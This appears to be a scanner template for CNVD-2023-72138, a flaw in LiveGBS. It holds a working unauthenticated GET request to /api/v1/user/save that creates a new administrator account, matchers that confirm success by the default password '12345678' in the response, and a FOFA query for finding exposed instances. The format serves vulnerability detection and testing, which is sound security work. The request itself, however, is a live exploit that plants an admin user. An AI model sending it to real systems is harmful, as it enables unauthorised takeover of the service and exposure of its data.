## id: CNVD-2023-72138
## name: LiveGBS user/save - Logical Flaw
## author: hack007x
## severity: high
## tags: cnvd,cnvd2023,livegbs,info-leak,vuln
## description: There is a logic defect vulnerability in LiveGBS user/save. Unauthenticated attackers can exploit this vulnerability to arbitrarily add users, resulting in the takeover of background services and causing adverse effects such as information leakage.
## reference: https://github.com/wy876/POC/blob/main/LiveGBS%E5%AD%98%E5%9C%A8%E9%80%BB%E8%BE%91%E7%BC%BA%E9%99%B7%E6%BC%8F%E6%B4%9E(CNVD-2023-72138).md
## fofa-query: icon_hash="-206100324"
## verification: true

#$ user = {{to_lower(rand_base(5))}}
GET /api/v1/user/save?ID=&Username={{user}}&Role=管理员&Enable=true HTTP/1.1
Host: {{Hostname}}
User-Agent: {{random_ua}}

#@ condition: and
#@ matcher: body contains '"DefaultUserPassword": "12345678"'
#@ matcher: body contains "ID"
#@ matcher: body contains "application/json"
#@ matcher: status_code == 200





# @VEIL-STAMP: 6978cef0593ae05dac45ebbd449b600ce92a9f671b9a319ef7e32dfdf921313b
